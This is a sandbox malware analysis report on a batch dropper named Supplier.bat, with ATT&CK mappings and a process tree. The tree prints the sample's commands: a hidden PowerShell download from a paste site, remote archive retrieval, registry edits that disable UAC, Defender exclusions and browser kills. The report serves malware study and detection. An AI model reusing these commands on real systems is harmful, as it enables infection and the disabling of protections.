b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d

Analysis

max time kernel
36s
max time network
37s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
30-12-2024 10:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Supplier.bat
Size

41KB
MD5

b84568e632497dd5dc2f4ac9f08b783c
SHA1

a0a8e9493a356a2c495130da52c5b49c3d82685a
SHA256

b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
SHA512

e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
SSDEEP

96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/cdfd23f3b9ad

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2188	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2188	powershell.exe
2920	powershell.exe
916	powershell.exe
1696	powershell.exe
1408	powershell.exe
3036	powershell.exe
2088	powershell.exe
2028	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
15	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1832	timeout.exe
2136	timeout.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
3004	taskkill.exe
3040	taskkill.exe
2232	taskkill.exe
2404	taskkill.exe
2540	taskkill.exe
1744	taskkill.exe
2616	taskkill.exe
1576	taskkill.exe
2004	taskkill.exe
2196	taskkill.exe
908	taskkill.exe
2676	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7DF71481-C698-11EF-A5E9-FE7389BE724D} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

pid	Process
2104	reg.exe
2648	reg.exe
2012	reg.exe
2280	reg.exe
2744	reg.exe
1612	reg.exe
2396	reg.exe
1520	reg.exe
2908	reg.exe
1144	reg.exe
956	reg.exe
1068	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2188	powershell.exe
2920	powershell.exe
2920	powershell.exe
2920	powershell.exe
1408	powershell.exe
3036	powershell.exe
2088	powershell.exe
2028	powershell.exe
916	powershell.exe
1696	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeRestorePrivilege	900	7z.exe
Token: 35	900	7z.exe
Token: SeSecurityPrivilege	900	7z.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	1744	taskkill.exe
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	3004	taskkill.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	908	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1456	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1456	iexplore.exe
1456	iexplore.exe
2340	IEXPLORE.EXE
2340	IEXPLORE.EXE
2340	IEXPLORE.EXE
2340	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 2904	2604	cmd.exe	31
PID 2604 wrote to memory of 2904	2604	cmd.exe	31
PID 2604 wrote to memory of 2904	2604	cmd.exe	31
PID 2904 wrote to memory of 2188	2904	cmd.exe	33
PID 2904 wrote to memory of 2188	2904	cmd.exe	33
PID 2904 wrote to memory of 2188	2904	cmd.exe	33
PID 2904 wrote to memory of 2920	2904	cmd.exe	34
PID 2904 wrote to memory of 2920	2904	cmd.exe	34
PID 2904 wrote to memory of 2920	2904	cmd.exe	34
PID 2920 wrote to memory of 2712	2920	powershell.exe	35
PID 2920 wrote to memory of 2712	2920	powershell.exe	35
PID 2920 wrote to memory of 2712	2920	powershell.exe	35
PID 2712 wrote to memory of 2280	2712	cmd.exe	37
PID 2712 wrote to memory of 2280	2712	cmd.exe	37
PID 2712 wrote to memory of 2280	2712	cmd.exe	37
PID 2712 wrote to memory of 2744	2712	cmd.exe	38
PID 2712 wrote to memory of 2744	2712	cmd.exe	38
PID 2712 wrote to memory of 2744	2712	cmd.exe	38
PID 2904 wrote to memory of 1456	2904	cmd.exe	39
PID 2904 wrote to memory of 1456	2904	cmd.exe	39
PID 2904 wrote to memory of 1456	2904	cmd.exe	39
PID 2904 wrote to memory of 1832	2904	cmd.exe	40
PID 2904 wrote to memory of 1832	2904	cmd.exe	40
PID 2904 wrote to memory of 1832	2904	cmd.exe	40
PID 2712 wrote to memory of 956	2712	cmd.exe	41
PID 2712 wrote to memory of 956	2712	cmd.exe	41
PID 2712 wrote to memory of 956	2712	cmd.exe	41
PID 2712 wrote to memory of 1612	2712	cmd.exe	42
PID 2712 wrote to memory of 1612	2712	cmd.exe	42
PID 2712 wrote to memory of 1612	2712	cmd.exe	42
PID 2712 wrote to memory of 2396	2712	cmd.exe	43
PID 2712 wrote to memory of 2396	2712	cmd.exe	43
PID 2712 wrote to memory of 2396	2712	cmd.exe	43
PID 2712 wrote to memory of 2104	2712	cmd.exe	44
PID 2712 wrote to memory of 2104	2712	cmd.exe	44
PID 2712 wrote to memory of 2104	2712	cmd.exe	44
PID 2712 wrote to memory of 1520	2712	cmd.exe	45
PID 2712 wrote to memory of 1520	2712	cmd.exe	45
PID 2712 wrote to memory of 1520	2712	cmd.exe	45
PID 2712 wrote to memory of 2648	2712	cmd.exe	46
PID 2712 wrote to memory of 2648	2712	cmd.exe	46
PID 2712 wrote to memory of 2648	2712	cmd.exe	46
PID 1456 wrote to memory of 2340	1456	iexplore.exe	47
PID 1456 wrote to memory of 2340	1456	iexplore.exe	47
PID 1456 wrote to memory of 2340	1456	iexplore.exe	47
PID 1456 wrote to memory of 2340	1456	iexplore.exe	47
PID 2712 wrote to memory of 2012	2712	cmd.exe	48
PID 2712 wrote to memory of 2012	2712	cmd.exe	48
PID 2712 wrote to memory of 2012	2712	cmd.exe	48
PID 2712 wrote to memory of 1068	2712	cmd.exe	49
PID 2712 wrote to memory of 1068	2712	cmd.exe	49
PID 2712 wrote to memory of 1068	2712	cmd.exe	49
PID 2712 wrote to memory of 2908	2712	cmd.exe	50
PID 2712 wrote to memory of 2908	2712	cmd.exe	50
PID 2712 wrote to memory of 2908	2712	cmd.exe	50
PID 2712 wrote to memory of 1144	2712	cmd.exe	51
PID 2712 wrote to memory of 1144	2712	cmd.exe	51
PID 2712 wrote to memory of 1144	2712	cmd.exe	51
PID 2712 wrote to memory of 1408	2712	cmd.exe	52
PID 2712 wrote to memory of 1408	2712	cmd.exe	52
PID 2712 wrote to memory of 1408	2712	cmd.exe	52
PID 2712 wrote to memory of 3036	2712	cmd.exe	53
PID 2712 wrote to memory of 3036	2712	cmd.exe	53
PID 2712 wrote to memory of 3036	2712	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Supplier.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2712
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2280
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:2744
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:956
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1612
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2396
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2104
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1520
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2648
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2012
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1068
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2908
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1408
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1456
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1456 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2340
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:1832
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:900
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2136
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2616
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3004
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:908
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f1c91b363158fe78ed41c0dba25631a6

SHA1
26f5c239ed333f301d3e3fa7086f4163fd787712

SHA256
a75b29a136701c2457f4eb7006761be2ef15f1999048b1abc41a2d58a02fb314

SHA512
06009d7241e24d4a5a6f43558276be7479236481967f5459e9b037053c3cfaaef4297da6c8b5b9496b8e923fbec10d2744d177ed22e41d74e84236ab27b2e5a1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
28feec14ea984bee08d0bc1fcead0e1e

SHA1
9b493d319ed86b2c5fbe332824c2def32d9cdc7e

SHA256
3254ea4d449218b77e24d0b9b8721685ddf1040937ff61fefade7bfbee8ef3bf

SHA512
01421dc0aa5f9e769e14aeb480716a03ba202a88298ca01b2f99daefde0f618cb818028518426b534902a27a78fb8eebdb5b986434a8497a3753414766696e9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
185e5c18fc2233b4bb5d9abb94ca57ad

SHA1
c8fcfd2a592bd7303390e73aada1d6ed67bf535c

SHA256
b2e3f7164783d53fc23236577ac5f0724b288b93641b20944ac08f2243233bea

SHA512
9bd75fa338c1f75db67d65959da8745b47405cf26f0c91d4ea0641a29e6487a0c9dd4760ecc2c6e60a5dd46b7900b9a09b23eaf3e0962a0b554037e7e425e253

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aea021ac5bb6a0b51382efada4970509

SHA1
1ee75dc23ca7d0423151792096b8fe51d835f434

SHA256
c1464278661eaffeaadad71504675f7a659af06bb9ee0e370c216d52055ba6e4

SHA512
64c26c41c69880f802d8c81f017f86787d95646e35a8e5b1deed34d36b28e9ffb26dc851839f4137c99b8ad2f7c0854a3b757ecfe6a10cabe4412f4a5f715cdc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b9f1e2337f9ee6de7d53e661235b261f

SHA1
9f572b3514ee82133be1b52a6a1003f0c9b22ebe

SHA256
6761de918f96b3d49ecdaf531e4f013cdf9d80c4e786dfc4a82d313b304897e3

SHA512
b94c16d40baf906de75004bc3119cee232afca8133d8c9a2830b174404251207b957fa5e6a927f90546558b2ca6d201b2479c99a7a153d574552d7ae365b2325

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7dde04b8a2e553fb49af5dbc4c9c41a9

SHA1
56ff42f2fdc8f0812e1f246a1922be3fd3d18b98

SHA256
0659ce3e2b7207a5fdee43f5b37ff3c2119dea26952a5ca76ca8b2b3bd1baf00

SHA512
7507d0fdbe1262098bc1781205f90325de4807a7a3c2298f147f5cfd14c1b1b0298b65802c814cc5a78561b5ca8c331335bf5ecaea57872a19e2bc6089e5bf7a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4f57c04eedc83bf1f5661044e39281c5

SHA1
143bcd8dad1ac5f1547ceaa2e4a79557c6cb79f8

SHA256
61786517d5a6eb19fa8ac57850499ffb4015cf2024cd2d3d7b2bab296d90747f

SHA512
37b754936d001ba22e01e8289fcee38bea961687f820eada8fcd22b3de03cc3f3922807eb56d5d2400ec132cb1021988896d7a7f2aaee95ad4fa4c03e0a57209

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
400450a72c4cef49ed8debf6bdc486df

SHA1
b3f0df3087a2848d46bee074ab799f73e6b8f1c3

SHA256
a51af95b9e70ad336c27589298c0050c5a915a07b7ce3772d2e88aa43ceb905b

SHA512
683100972a6d8f7767fa4e1c057025bfe994f42aec12aaef7547ba4882ce6afe3c955b4ee50f1b0be8f9ff585c99fbfdbcfccfca23b1896aeb2bffc030db756a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
418ee25b90ce1d8e7916547d1ec0ec64

SHA1
26e1dfc473e1a10cd0db86ff2d2599aa4a2a8a39

SHA256
b8aad078d534ea0b2405ebaa7235986df603dd08ffc8a36f660fcb3ac13ed8ff

SHA512
3f7b865848544ec6faf306569098d4092b8ee4201c7f2dcd7f24a97fd74fa911b1b42ad5f13602f3a374665d57e2316b4f8571acf2929a14f4640d17f175f2f4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ba4a13ebf0c09a23ac67d7d0d6ae6d4a

SHA1
9c531da2784dafdfe7496241f3573fb99b2740b5

SHA256
9f55e23a7a8699a47c9d24de6f4fe75bffff0fa04ec9c98e80ea7101bc573193

SHA512
7f8767b6e2fbe85dffb6126281b7a58496f50654656af64e9d0178add8f9adbd3748dc35a07ea36bd08f979c437e94a41368026657c888ea996d1f6872ca5f31

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b1bbf90980358ed5517d39b1907c90d1

SHA1
bbf1d7bcd10f1a3006135c3fedc64e48d7865f9c

SHA256
a63815a07b6dd517a448d28267e611b3d446df1ba8f2b16bf350d320d1430361

SHA512
443b5c7097aee65b31acb2d963a8f9ae05cde0348c9f79e4cf74d08313f37193703363050152dfd44067c13fa9a6cf175bb7feafef8672ccdaf40616f55faf34

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
87b0cdb70102557940f9f5638a2c7472

SHA1
